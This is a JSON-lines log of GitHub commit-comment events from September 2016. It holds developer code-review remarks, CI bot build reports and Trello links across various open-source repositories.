{"id":"4602420517","type":"CommitCommentEvent","actor":{"login":"emeryberger"},"repo":{"name":"emeryberger/CSrankings"},"payload":{"comment":{"id":19130108,"position":null,"line":null,"path":null,"commit_id":"54de9a3dd1cc11dac87141df78712d26a1beeb47","created_at":"2016-09-22T13:26:28Z","updated_at":"2016-09-22T13:26:28Z","body":"Not sure I understand. The total count is not the average count (which is a geometric mean) - it is always going to be much larger.\r\n"}},"created_at":"2016-09-22T13:26:28Z"}
{"id":"4602421946","type":"CommitCommentEvent","actor":{"login":"ioannad"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19130114,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-22T13:26:44Z","updated_at":"2016-09-22T13:26:44Z","body":"Wait a minute...:\r\n> foo[bar] is nothing but syntactic sugar for *(foo + bar)  \r\n\r\nDue to (2) I assume you mean foo[bar]==\\*(foo + (sizeof-foo)*bar)?\r\n> Due to rule (3.) above, gpio[LED_GPFSEL] really is *(gpio + LED_GPFSEL). Assuming LED_GPFSEL happens to be 4, that in fact really is the same as your led_prep\r\n\r\nIn fact `LED_GPFSEL == 1`. So I guess unsigned ints have 4bytes size here, so I have to divide by 4 everything i added to GPIO_BASE before... thankfully I have a calculator: `gpio[0x1c>>2]  |= (1<<16)` etc. :)\r\n\r\n`(0x1c>>2)[gpio]` etc works fine! :laughing: \r\n\r\n\r\n \r\n"}},"created_at":"2016-09-22T13:26:44Z"}
{"id":"4602423415","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"tegularius/sch_cake"},"payload":{"comment":{"id":19130118,"position":null,"line":null,"path":null,"commit_id":"2f3c308faec499069959b4489e5a724a7d3b82f3","created_at":"2016-09-22T13:27:01Z","updated_at":"2016-09-22T13:27:01Z","body":"This hits the same problem I encountered... on an 'ingress' interface say using an 'IFB', linux hasn't yet got around to populating the ct info on the skb, so trying to de-nat the destination address on an ifb interface just returns null all the time."}},"created_at":"2016-09-22T13:27:01Z"}
{"id":"4602426286","type":"CommitCommentEvent","actor":{"login":"reichan"},"repo":{"name":"reichan/learn"},"payload":{"comment":{"id":19130122,"position":null,"line":null,"path":null,"commit_id":"0b26407a35110b79bbe3841daf0bfb92ffdb45d6","created_at":"2016-09-22T13:27:33Z","updated_at":"2016-09-22T13:27:33Z","body":"i am exited"}},"created_at":"2016-09-22T13:27:33Z"}
{"id":"4602430783","type":"CommitCommentEvent","actor":{"login":"rgrig"},"repo":{"name":"emeryberger/CSrankings"},"payload":{"comment":{"id":19130131,"position":null,"line":null,"path":null,"commit_id":"54de9a3dd1cc11dac87141df78712d26a1beeb47","created_at":"2016-09-22T13:28:20Z","updated_at":"2016-09-22T13:28:20Z","body":"Why are you talking about the \"average count\"?"}},"created_at":"2016-09-22T13:28:20Z"}
{"id":"4602432069","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19130137,"position":null,"line":null,"path":null,"commit_id":"e840d7d0c5dbac7f172d5d2b3c646ff72669eb36","created_at":"2016-09-22T13:28:34Z","updated_at":"2016-09-22T13:28:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aLyeoIIuTfa6FbkYjhJwYA"}},"created_at":"2016-09-22T13:28:34Z"}
{"id":"4602434067","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19130147,"position":null,"line":null,"path":null,"commit_id":"e840d7d0c5dbac7f172d5d2b3c646ff72669eb36","created_at":"2016-09-22T13:28:56Z","updated_at":"2016-09-22T13:28:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GcwL_YqVTgyHW1WowHg_bw"}},"created_at":"2016-09-22T13:28:56Z"}
{"id":"4602436035","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19130149,"position":null,"line":null,"path":null,"commit_id":"628b1257c6600f4d580c388643faf4634da87b26","created_at":"2016-09-22T13:29:16Z","updated_at":"2016-09-22T13:29:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1120](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13953&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:07:05"}},"created_at":"2016-09-22T13:29:16Z"}
{"id":"4602441130","type":"CommitCommentEvent","actor":{"login":"janarahul"},"repo":{"name":"janarahul/NammaAuto"},"payload":{"comment":{"id":19130160,"position":null,"line":null,"path":null,"commit_id":"9c8768e50f6051f48dad5274c05b3c03e62a0471","created_at":"2016-09-22T13:30:13Z","updated_at":"2016-09-22T13:30:13Z","body":"hi"}},"created_at":"2016-09-22T13:30:13Z"}
{"id":"4602442369","type":"CommitCommentEvent","actor":{"login":"rgrig"},"repo":{"name":"emeryberger/CSrankings"},"payload":{"comment":{"id":19130162,"position":null,"line":null,"path":null,"commit_id":"54de9a3dd1cc11dac87141df78712d26a1beeb47","created_at":"2016-09-22T13:30:24Z","updated_at":"2016-09-22T13:30:24Z","body":"If X = \\sum_i x_i, then floor(X) will be significantly smaller than \\sum_i floor(x_i), but round(X) will be roughly-kinda-close to \\sum_i round(x_i). In your terminology, X is \"total count\", and x_i are \"adjusted counts\"."}},"created_at":"2016-09-22T13:30:24Z"}
{"id":"4602446052","type":"CommitCommentEvent","actor":{"login":"juxbox"},"repo":{"name":"ErikMinekus/traktor-kontrol-screens"},"payload":{"comment":{"id":19130175,"position":null,"line":null,"path":null,"commit_id":"43d24f8935e17cff54c02f3a742a8d4d94ba0d51","created_at":"2016-09-22T13:31:02Z","updated_at":"2016-09-22T13:31:02Z","body":"hello erik please make pc traktor screen keys colored"}},"created_at":"2016-09-22T13:31:02Z"}
{"id":"4602451003","type":"CommitCommentEvent","actor":{"login":"gibatronic"},"repo":{"name":"rbsdev/feedr"},"payload":{"comment":{"id":19130191,"position":null,"line":null,"path":null,"commit_id":"d22cac8e18d43c5fae2dbe0f0153dad58d1219dd","created_at":"2016-09-22T13:31:58Z","updated_at":"2016-09-22T13:31:58Z","body":"não se esquece de atualizar os testeees: https://travis-ci.org/rbsdev/feedr"}},"created_at":"2016-09-22T13:31:58Z"}
{"id":"4602452624","type":"CommitCommentEvent","actor":{"login":"deepakjois"},"repo":{"name":"deepakjois/harfbuzz-go"},"payload":{"comment":{"id":19130196,"position":null,"line":null,"path":null,"commit_id":"aef981c668290801ca0f51e817089c2a771d5799","created_at":"2016-09-22T13:32:16Z","updated_at":"2016-09-22T13:32:16Z","body":"Done in `0ec010d`"}},"created_at":"2016-09-22T13:32:16Z"}
{"id":"4602453596","type":"CommitCommentEvent","actor":{"login":"GS05-43-MatsumuraYu"},"repo":{"name":"GS05-43-MatsumuraYu/kadai"},"payload":{"comment":{"id":19130199,"position":null,"line":null,"path":null,"commit_id":"270260effaec0ba483ced20911cbfee9f82dc8b7","created_at":"2016-09-22T13:32:28Z","updated_at":"2016-09-22T13:32:28Z","body":"これはkadaiのファイルではありません。「8」が今回の課題です。"}},"created_at":"2016-09-22T13:32:28Z"}
{"id":"4602456748","type":"CommitCommentEvent","actor":{"login":"orischwartz"},"repo":{"name":"department-of-veterans-affairs/caseflow-certification"},"payload":{"comment":{"id":19130204,"position":15,"line":71,"path":"app/controllers/certifications_controller.rb","commit_id":"a37813b76ca1bc2a88e6d19e08744abdec2b575f","created_at":"2016-09-22T13:33:01Z","updated_at":"2016-09-22T13:33:01Z","body":"Late on this but the only difference would be per user (from multiple browsers) vs per session (specific to browser). So no harm as far as I can tell."}},"created_at":"2016-09-22T13:33:01Z"}
{"id":"4602458183","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130207,"position":null,"line":null,"path":null,"commit_id":"c4fbfa69d1d654df685add77430c54995916c296","created_at":"2016-09-22T13:33:16Z","updated_at":"2016-09-22T13:33:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T13:33:16Z"}
{"id":"4602460283","type":"CommitCommentEvent","actor":{"login":"deepakjois"},"repo":{"name":"deepakjois/harfbuzz-go"},"payload":{"comment":{"id":19130214,"position":null,"line":null,"path":null,"commit_id":"aef981c668290801ca0f51e817089c2a771d5799","created_at":"2016-09-22T13:33:39Z","updated_at":"2016-09-22T13:33:39Z","body":"Thank you. Added."}},"created_at":"2016-09-22T13:33:39Z"}
{"id":"4602460374","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130215,"position":null,"line":null,"path":null,"commit_id":"627f3f2c773342457db716d25b8c194a9912e4a4","created_at":"2016-09-22T13:33:40Z","updated_at":"2016-09-22T13:33:40Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T13:33:40Z"}
{"id":"4602460589","type":"CommitCommentEvent","actor":{"login":"lemonzi"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19130217,"position":null,"line":null,"path":null,"commit_id":"fc5417d033a9af9832a579ac464b721f3c446306","created_at":"2016-09-22T13:33:41Z","updated_at":"2016-09-22T13:33:41Z","body":"Can we add Python2 to Travis?\n\nEl dj., 22 set. 2016 a les 8:24, Raimondas (<notifications@github.com>) va\nescriure:\n\n> Yes, I'm using python 2. So either check of python version and from\n> __future__ import division, or simple magnitude = (*1.* / mu) * ((1 +\n> mu)**abs(signal) - 1) fix is needed\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ibab/tensorflow-wavenet/commit/fc5417d033a9af9832a579ac464b721f3c446306#commitcomment-19129287>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADCF5jg3agv94yu67o-wjtWUx6gtUackks5qsnN0gaJpZM4KD0i2>\n> .\n>\n"}},"created_at":"2016-09-22T13:33:41Z"}
{"id":"4602460762","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130218,"position":20,"line":75,"path":"plugins/PerObjectSettingsTool/PerObjectSettingVisibilityHandler.py","commit_id":"c13003c960185a8f5d77a8235d6f7f4aa4befa03","created_at":"2016-09-22T13:33:44Z","updated_at":"2016-09-22T13:33:44Z","body":"You just removed the spaces around the `=`? :( I'm putting them back: 15792b8f091d800194a1c6b512dcb663d5ea817f"}},"created_at":"2016-09-22T13:33:44Z"}
{"id":"4602471341","type":"CommitCommentEvent","actor":{"login":"Muph0"},"repo":{"name":"Muph0/hunger-games-simulator"},"payload":{"comment":{"id":19130244,"position":null,"line":null,"path":null,"commit_id":"db32c5680bc27f3ba8b15d39742067a8f395fe09","created_at":"2016-09-22T13:35:35Z","updated_at":"2016-09-22T13:35:35Z","body":"Whoops, I forgot to add the Keyboard class to this commit, so here it goes db32c5680bc27f3ba8b15d39742067a8f395fe09"}},"created_at":"2016-09-22T13:35:35Z"}
{"id":"4602474824","type":"CommitCommentEvent","actor":{"login":"embray"},"repo":{"name":"OpenDreamKit/OpenDreamKit.github.io"},"payload":{"comment":{"id":19130252,"position":14,"line":14,"path":"_posts/2016-08-18-emerging-docker.md","commit_id":"34c601d0ff3681081f5ca5fb9c2afbd932bd3378","created_at":"2016-09-22T13:36:12Z","updated_at":"2016-09-22T13:36:12Z","body":"This is something that many people still seem to be confused by (understandably) and might be worth clarifying:  While it's true that the new Windows version of docker does not rely on Linux functionality, it doesn't mean you don't need Linux functionality to run *Linux containers*.\r\n\r\nWhat's actually going on here is that Microsoft has added a notion of \"containers\" built into the Windows kernel (see https://msdn.microsoft.com/en-us/virtualization/windowscontainers/about/about_overview).  MS helped rearchitect much of Docker so that its engine can manage containers through a higher level API, which also supports the [Open Container Initiative](https://www.opencontainers.org/about) specs.  Microsoft also provided some Go libraries (as Docker is written in Go) wrapping their container APIs.  So in short, most of the same code in Docker than manages Linux containers and images can be used (with small modifications) to manage Windows containers and images, and Microsoft promotes docker as *the* command-line interface for Windows Containers.\r\n\r\nSo to be clear, there are actually two separate builds of the Docker engine: One for Linux that runs on Linux and only manages Linux containers, and one build for Windows that runs natively on Windows and only manages Linux containers.  They do not interact with each other whatsoever. (Although the latest beta version of the Docker *client* for Windows allows selecting which engine the client should talk to--otherwise one needs two separate Docker clients).\r\n\r\nThe new Docker for Windows is still based on the Linux engine, which runs in a very lightweight VM (which has been configured Hyper-V paravirtualization support) through Hyper-V.  Because it's using Microsoft's native hypervisor it does integrate better and a little more transparently.  This includes things like better volume support as well.\r\n\r\nBut when talking about \"Docker for Windows\" one has to be clear what one is actually referring to, and running Linux containers on Windows *does* rely on Linux functionality.  I feel like the literature from Docker itself has been less than clear about this.  As far as I can tell much of \"Docker for Windows\" is not open source either."}},"created_at":"2016-09-22T13:36:12Z"}
{"id":"4602474841","type":"CommitCommentEvent","actor":{"login":"lemonzi"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19130251,"position":null,"line":null,"path":null,"commit_id":"fc5417d033a9af9832a579ac464b721f3c446306","created_at":"2016-09-22T13:36:12Z","updated_at":"2016-09-22T13:36:12Z","body":"I vote for using explicit casts, though; they help at quickly identifying the types."}},"created_at":"2016-09-22T13:36:12Z"}
{"id":"4602476187","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130255,"position":null,"line":null,"path":null,"commit_id":"4306d887a6bc7f02e7626ddb859fde24eaf14c21","created_at":"2016-09-22T13:36:25Z","updated_at":"2016-09-22T13:36:25Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-lager/builds/433\n"}},"created_at":"2016-09-22T13:36:25Z"}
{"id":"4602476205","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130256,"position":null,"line":null,"path":null,"commit_id":"e22016062ee776090297569f6bed8658e1fbb20b","created_at":"2016-09-22T13:36:26Z","updated_at":"2016-09-22T13:36:26Z","body":"saw approval from JeetKunDoug\nat https://github.com/redink/lager/commit/e22016062ee776090297569f6bed8658e1fbb20b"}},"created_at":"2016-09-22T13:36:26Z"}
{"id":"4602476246","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130258,"position":null,"line":null,"path":null,"commit_id":"e22016062ee776090297569f6bed8658e1fbb20b","created_at":"2016-09-22T13:36:26Z","updated_at":"2016-09-22T13:36:26Z","body":"merging redink/lager/crash_log_undefined = e2201606 into borshop-integration-364-crash_log_undefined"}},"created_at":"2016-09-22T13:36:26Z"}
{"id":"4602476271","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130259,"position":null,"line":null,"path":null,"commit_id":"e22016062ee776090297569f6bed8658e1fbb20b","created_at":"2016-09-22T13:36:26Z","updated_at":"2016-09-22T13:36:26Z","body":"redink/lager/crash_log_undefined = e2201606 merged ok, testing candidate = a46e8c4f"}},"created_at":"2016-09-22T13:36:26Z"}
{"id":"4602479739","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130268,"position":null,"line":null,"path":null,"commit_id":"3f829620b5da4f38f807783f4d65328438a8a8c7","created_at":"2016-09-22T13:37:02Z","updated_at":"2016-09-22T13:37:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T13:37:02Z"}
{"id":"4602481601","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130276,"position":null,"line":null,"path":null,"commit_id":"d068b67cbeded7d49ebc631b1da69797aab373a0","created_at":"2016-09-22T13:37:20Z","updated_at":"2016-09-22T13:37:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T13:37:20Z"}
{"id":"4602481768","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19130277,"position":11,"line":11,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T13:37:22Z","updated_at":"2016-09-22T13:37:22Z","body":"Ho messo Sperimenta una navigazione più spericolata\nCommit: fb54b08f435e14647d4fc2c1f11e382c83a45494\n\n"}},"created_at":"2016-09-22T13:37:22Z"}
{"id":"4602482327","type":"CommitCommentEvent","actor":{"login":"joekraken"},"repo":{"name":"revature-js/innkeeper"},"payload":{"comment":{"id":19130280,"position":19,"line":75,"path":"tools/express_dal/server.js","commit_id":"b3b0f1afa5bd1b65a77b34d29f239f99277b08ea","created_at":"2016-09-22T13:37:27Z","updated_at":"2016-09-22T13:37:27Z","body":"allow access to express on AWS EC2"}},"created_at":"2016-09-22T13:37:27Z"}
{"id":"4602484310","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130285,"position":null,"line":null,"path":null,"commit_id":"09b1ef8a993891328891fb4ac028cb776a85edc3","created_at":"2016-09-22T13:37:47Z","updated_at":"2016-09-22T13:37:47Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T13:37:47Z"}
{"id":"4602485683","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19130291,"position":null,"line":null,"path":null,"commit_id":"310d64a16c2289b5e674e12b3c1e1773d0ad8978","created_at":"2016-09-22T13:38:00Z","updated_at":"2016-09-22T13:38:00Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5UYhmy8a&#x2F;27-as-a-product-owner-i-want-to-validate-users-before-sending-their-data-to-the-database-so-that-we-have-revelant-information-in-ou\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a Product Owner I want to validate Users before sending their data to the database,so that we have revelant information in our system</a>"}},"created_at":"2016-09-22T13:38:00Z"}
{"id":"4602492924","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19130307,"position":null,"line":null,"path":null,"commit_id":"97a8c2b5541d0f99575aafdc2084b0494f085ae9","created_at":"2016-09-22T13:39:13Z","updated_at":"2016-09-22T13:39:13Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=34)"}},"created_at":"2016-09-22T13:39:13Z"}
{"id":"4602494262","type":"CommitCommentEvent","actor":{"login":"rsalveti"},"repo":{"name":"ldts/zephyr"},"payload":{"comment":{"id":19130310,"position":5,"line":24,"path":"drivers/clock_control/stm32f4x_clock.c","commit_id":"bb783ff13165a4b981ace02af50296a81150c524","created_at":"2016-09-22T13:39:25Z","updated_at":"2016-09-22T13:39:25Z","body":"Editor/lang problem?"}},"created_at":"2016-09-22T13:39:25Z"}
{"id":"4602497542","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130320,"position":19,"line":76,"path":"plugins/PerObjectSettingsTool/PerObjectSettingVisibilityHandler.py","commit_id":"c13003c960185a8f5d77a8235d6f7f4aa4befa03","created_at":"2016-09-22T13:40:00Z","updated_at":"2016-09-22T13:40:00Z","body":"This causes `stack` to always be `None` for single-extrusion machines like our own flagship, UM2+. As a consequence, it doesn't inherit from anything in single-extrusion printers. It should inherit from the global stack then."}},"created_at":"2016-09-22T13:40:00Z"}
{"id":"4602500256","type":"CommitCommentEvent","actor":{"login":"igmar"},"repo":{"name":"rythmengine/rythmengine"},"payload":{"comment":{"id":19130327,"position":null,"line":null,"path":null,"commit_id":"e088577eb5a25ca06c9c4d9b55f90411af1fed87","created_at":"2016-09-22T13:40:27Z","updated_at":"2016-09-22T13:40:27Z","body":"We should ignore them. 1.6 is not supported anymore, and is 2 major versions behind. That people still use it isn't a good reason to keep old code in."}},"created_at":"2016-09-22T13:40:27Z"}
{"id":"4602501604","type":"CommitCommentEvent","actor":{"login":"rsalveti"},"repo":{"name":"ldts/zephyr"},"payload":{"comment":{"id":19130334,"position":17,"line":74,"path":"samples/drivers/soc_flash_stm32f4/src/main.c","commit_id":"bb783ff13165a4b981ace02af50296a81150c524","created_at":"2016-09-22T13:40:40Z","updated_at":"2016-09-22T13:40:40Z","body":"} else { should be at the same line."}},"created_at":"2016-09-22T13:40:40Z"}
{"id":"4602503291","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130342,"position":27,"line":81,"path":"plugins/PerObjectSettingsTool/PerObjectSettingVisibilityHandler.py","commit_id":"c13003c960185a8f5d77a8235d6f7f4aa4befa03","created_at":"2016-09-22T13:40:58Z","updated_at":"2016-09-22T13:40:58Z","body":"A value of `None` would give all sorts of problems when trying to inherit or display the value, right?"}},"created_at":"2016-09-22T13:40:58Z"}
{"id":"4602503796","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19130345,"position":null,"line":null,"path":null,"commit_id":"84d9aed76a0f2a23b26db5f1cf9a84dd35d2739e","created_at":"2016-09-22T13:41:03Z","updated_at":"2016-09-22T13:41:03Z","body":"This patch may be worth a try at LTC."}},"created_at":"2016-09-22T13:41:03Z"}
{"id":"4602504183","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19130351,"position":14,"line":52,"path":"src/main/java/medic/gateway/alert/Db.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-22T13:41:07Z","updated_at":"2016-09-22T13:41:07Z","body":"probably worth a `counLogMessages` function"}},"created_at":"2016-09-22T13:41:07Z"}
{"id":"4602505802","type":"CommitCommentEvent","actor":{"login":"ibab"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19130355,"position":null,"line":null,"path":null,"commit_id":"fc5417d033a9af9832a579ac464b721f3c446306","created_at":"2016-09-22T13:41:24Z","updated_at":"2016-09-22T13:41:24Z","body":"@lemonzi: Right this, would actually have been covered by the CI if we had enabled Python 2.\r\nI've just pushed a commit that does that."}},"created_at":"2016-09-22T13:41:24Z"}
{"id":"4602506326","type":"CommitCommentEvent","actor":{"login":"jmisur"},"repo":{"name":"ScaCap/spring-auto-restdocs"},"payload":{"comment":{"id":19130360,"position":111,"line":85,"path":"spring-auto-restdocs-core/src/test/java/capital/scalable/restdocs/response/ResponseModifyingPreprocessorsTest.java","commit_id":"e76b518c32dfccacba06e2702816a82486079d67","created_at":"2016-09-22T13:41:29Z","updated_at":"2016-09-22T13:41:29Z","body":"I would be also ok with 4 params ;) but we can reuse this later LGTM"}},"created_at":"2016-09-22T13:41:29Z"}
{"id":"4602508916","type":"CommitCommentEvent","actor":{"login":"gareth"},"repo":{"name":"circleci/minitest-ci"},"payload":{"comment":{"id":19130369,"position":20,"line":20,"path":"README.rdoc","commit_id":"25b25405d7642dc1d5098ec78de3be9654e90a31","created_at":"2016-09-22T13:41:56Z","updated_at":"2016-09-22T13:41:56Z","body":"Nice new documentation, but I think this should just be `\"minitest-ci\"` 😃 "}},"created_at":"2016-09-22T13:41:56Z"}
{"id":"4602509655","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19130372,"position":19,"line":57,"path":"src/main/java/medic/gateway/alert/Db.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-22T13:42:04Z","updated_at":"2016-09-22T13:42:04Z","body":"or maybe just a `count` function, realizing it's different tables"}},"created_at":"2016-09-22T13:42:04Z"}
{"id":"4602511410","type":"CommitCommentEvent","actor":{"login":"karandesai-96"},"repo":{"name":"sdsmdg/liener"},"payload":{"comment":{"id":19130377,"position":null,"line":null,"path":null,"commit_id":"6a82679ef7c05cee42369ccc16899db9f4a9cab8","created_at":"2016-09-22T13:42:21Z","updated_at":"2016-09-22T13:42:21Z","body":"Do not commit .idea files. Please take care."}},"created_at":"2016-09-22T13:42:21Z"}
{"id":"4602516780","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19130389,"position":48,"line":19,"path":"downloaders/enrich.js","commit_id":"9d193616863cbdc8a7af52633b119ba8711b46a4","created_at":"2016-09-22T13:43:15Z","updated_at":"2016-09-22T13:43:15Z","body":"eslint n'aime pas qu'on fasse un require qui n'est pas global (`global-require`)."}},"created_at":"2016-09-22T13:43:15Z"}
{"id":"4602519229","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130395,"position":10,"line":269,"path":"plugins/PerObjectSettingsTool/PerObjectSettingsPanel.qml","commit_id":"b7351a56e416beec25dbbaf4d4b14a1609251d2b","created_at":"2016-09-22T13:43:39Z","updated_at":"2016-09-22T13:43:39Z","body":"This force smells. Why don't we have just a normal signal for extruder changing that all the settings' propertyChanged functions register with?"}},"created_at":"2016-09-22T13:43:39Z"}
{"id":"4602521812","type":"CommitCommentEvent","actor":{"login":"beanpole135"},"repo":{"name":"trueos/lumina"},"payload":{"comment":{"id":19130400,"position":null,"line":null,"path":null,"commit_id":"e24b7b3f822a55aa8210ed21d50349147426f7a3","created_at":"2016-09-22T13:44:05Z","updated_at":"2016-09-22T13:44:05Z","body":"See ticket #266 : This only puts a band-aid on the real problem - still working on the \"real\" fix for it..."}},"created_at":"2016-09-22T13:44:05Z"}
{"id":"4602524793","type":"CommitCommentEvent","actor":{"login":"diyiwen"},"repo":{"name":"diyiwen/dywfs"},"payload":{"comment":{"id":19130406,"position":null,"line":null,"path":null,"commit_id":"85bc79b787ae80226590d9539bd4cdfc7d86573a","created_at":"2016-09-22T13:44:32Z","updated_at":"2016-09-22T13:44:32Z","body":"This is the first edition"}},"created_at":"2016-09-22T13:44:32Z"}
{"id":"4602526765","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19130413,"position":null,"line":null,"path":null,"commit_id":"2702caadf161ef639de9c5dc1dc58facc11d6f6b","created_at":"2016-09-22T13:44:51Z","updated_at":"2016-09-22T13:44:51Z","body":"Oops - no, build fails here as well. I had compiled for armv7, not armv6.\r\nStill looking for the cause."}},"created_at":"2016-09-22T13:44:51Z"}
{"id":"4602528352","type":"CommitCommentEvent","actor":{"login":"fbenz"},"repo":{"name":"ScaCap/spring-auto-restdocs"},"payload":{"comment":{"id":19130424,"position":111,"line":85,"path":"spring-auto-restdocs-core/src/test/java/capital/scalable/restdocs/response/ResponseModifyingPreprocessorsTest.java","commit_id":"e76b518c32dfccacba06e2702816a82486079d67","created_at":"2016-09-22T13:45:08Z","updated_at":"2016-09-22T13:45:08Z","body":"Four params would make the tests harder to read."}},"created_at":"2016-09-22T13:45:08Z"}
